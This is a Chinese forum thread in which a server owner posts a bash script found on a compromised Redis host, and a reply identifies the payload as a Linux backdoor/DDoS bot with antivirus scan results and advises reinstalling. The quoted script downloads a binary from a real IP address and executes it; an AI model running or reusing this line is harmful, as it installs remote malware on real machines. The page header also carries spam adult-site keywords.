国产av日韩一区二区三区精品,成人性爱视频在线观看,国产,欧美,日韩,一区,www.成色av久久成人,2222eeee成人天堂

linux - 這段黑客程式碼什麼意思?
ringa_lee
ringa_lee 2017-06-07 09:24:08
0
2
1025

今天發(fā)現(xiàn)一臺(tái)伺服器redis無法連接,在伺服器發(fā)現(xiàn)這樣一條指令

#!/bin/bash
zfile="/tmp/z.TF"

if [ ! -f "$zfile" ]; then  
    wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi

下載並執(zhí)行了z.TF文件,z.TF開啟都是字節(jié)碼,此程式可以自動(dòng)重新執(zhí)行。

目前將此程式進(jìn)程殺死,但redis服務(wù)仍然無法使用,不知道是否還有其他惡意程式。

請(qǐng)高手解答z.TF的內(nèi)容?並且如何處理。

ringa_lee
ringa_lee

ringa_lee

全部回覆(2)
巴扎黑

z.TF 是個(gè)ELF格式的linux執(zhí)行檔

你伺服器被裝了後門,盡快重裝系統(tǒng),修復(fù)漏洞。
該升級(jí)的都升級(jí)一遍。

基本上可以確定是 後門+肉雞

VirSCAN.org Scanned Report :
Scanned time   : 2017-06-06 20:53:39
Scanner results: 10%的殺軟(4/39)報(bào)告發(fā)現(xiàn)病毒
File Name      : z.TF
File Size      : 649640 byte
File Type      : application/x-executable
MD5            : a6f42e73365ad56ce42985c5518d7e34
SHA1           : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
Online report  : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
AVAST!         170303-1       4.7.4             2017-03-03     46   ELF:Ddostf-A                  
SOPHOS         5.32           3.65.2            2016-10-10     8    Linux/DDoS-BE                 
奇虎360         1.0.1          1.0.1             1.0.1          4    Win32/Backdoor.34d            
江民殺毒         16.0.100       1.0.0.0           2017-06-05     2    Backdoor.Linux.wfg
某草草

話說你把t.ZF的程式碼寄上來啊

你貼出來的程式碼,你不是自己已經(jīng)解釋清楚了麼

最新下載
更多>
網(wǎng)站特效
網(wǎng)站源碼
網(wǎng)站素材
前端模板